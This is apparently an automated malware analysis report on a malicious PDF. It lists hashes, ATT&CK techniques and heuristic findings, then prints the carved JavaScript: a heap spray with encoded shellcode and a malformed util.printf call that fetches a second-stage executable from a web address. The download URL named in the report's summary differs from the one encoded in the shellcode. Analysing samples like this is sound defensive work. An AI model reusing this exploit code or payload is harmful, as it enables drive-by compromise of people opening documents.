Malicious PDF — malware analysis report

Static analysis result for SHA-256 ae9e45e72912ab35…

Verdict: MALICIOUS
File type: PDF
Size: 1.8 KB
First seen: 2012-10-23
MD5: 405932cc6077436b810119f55e6ee56a
SHA-1: 6396001f399e024459e118c6446099e942ab76a9
SHA-256: ae9e45e72912ab3547c04e3f240e7cd98a9aed64dd8c0210178f64f11551b9a1
Risk score: 74

Malware Insights

MITRE ATT&CK

  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The PDF file contains obfuscated JavaScript stored behind ASCIIHexDecode and ASCII85Decode filters, a combination indicative of exploit code. The script attempts to download a second-stage payload from the URL 'http://192.168.1.100/glamarsl/glamarsl.exe?p=520-992-9932'. The ML classifier strongly flags this PDF as malicious, supporting the conclusion that it is designed for exploitation and payload delivery.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (4)

  • ASCIIHexDecode filter (with exploit indicators) [severity: medium; rule: PDF_FILTER_HEX]
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • JavaScript action [severity: low; 1 related finding; rule: PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream [severity: low; rule: PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ASCII85Decode filter (with exploit indicators) [severity: low; rule: PDF_FILTER_85]
    ASCII85 encoding filter present alongside exploit delivery indicators — uncommon outside of obfuscation

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: javascript_obj0006_000.js
    Kind: pdf-javascript-stream
    Source: PDF /JS object 6 at offset 0x138
    Size: 1406 bytes
    SHA-256: 727c286bb6324f0956093b5cea394245b4a0ce861f9aad7ffe4e4f15b14d322d

Script preview (first 1,000 lines of the extracted script):
var code = '\u72EB\u3160\u64C9\u718B\u8B30\u0C76\u768B\u8B1C\u085E\u568B\u8B20\u6636\u4A39\u7518\u89F2\u245C\u611C\u60C3\u6C8B\u2424\u458B\u8B3C\u0554\u0178\u8BEA\u184A\u5A8B\u0120\uE3EB\u4937\u348B\u018B\u31EE\u31FF\uFCC0\u84AC\u74C0\uC10A\u0DCF\uC701\uF1E9\uFFFF\u3BFF\u247C\u7528\u8BDE\u245A\uEB01\u8B66\u4B0C\u5A8B\u011C\u8BEB\u8B04\uE801\u4489\u1C24\uC361\u6DEB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uE8FF\uFF68\uFFFF\u8EBA\u0E4E\u52EC\uE850\uFF7D\uFFFF\uFF56\uBAD0\u1A36\u702F\u5052\u6EE8\uFFFF\u31FF\u52D2\u5352\u5255\uD0FF\u3FE8\uFFFF\uBAFF\uFE98\u0E8A\u5052\u54E8\uFFFF\u31FF\u81D2\uFFC2\uFFFF\u81FF\uFAEA\uFFFF\u52FF\uFF53\uEBD0\uEB02\uE816\uFF18\uFFFF\u7EBA\uE2D8\u5273\uE850\uFF2D\uFFFF\uD231\uFF52\uE8D0\uFF76\uFFFF\u7275\u6D6C\u6E6F\u642E\u6C6C\u75FF\u2E70\u7865\uFF65\u7468\u7074\u2F3A\u622F\u6C61\u6F6D\u6172\u736C\u7265\u6976\u6563\u2E73\u726F\u2F67\u654C\u4976\u4761\u726F\u2F65\u662F\u6C69\u2E65\u6870\u3F70\u3D65\u6441\u626F\u2D65\u3032\u3830\u322D\u3939\uFF32';var nops = '\u4b4f\u4027';var a = '';for (b = 128; b >= 0; --b) a += nops;c = a + code;d = nops;e = 20;f = e + c.length;while (d.length < f) d += d;g = d.substring(0, f);h = d.substring(0, d.length - f);while(h.length + f < 0x40000) h = h + h + g;i = new Array();for (j = 0; j < 1450; j++) i[j] = h + c;var z = 0;var ff = '45000';util.printf('%' + ff + '.' + ff + 'f', z);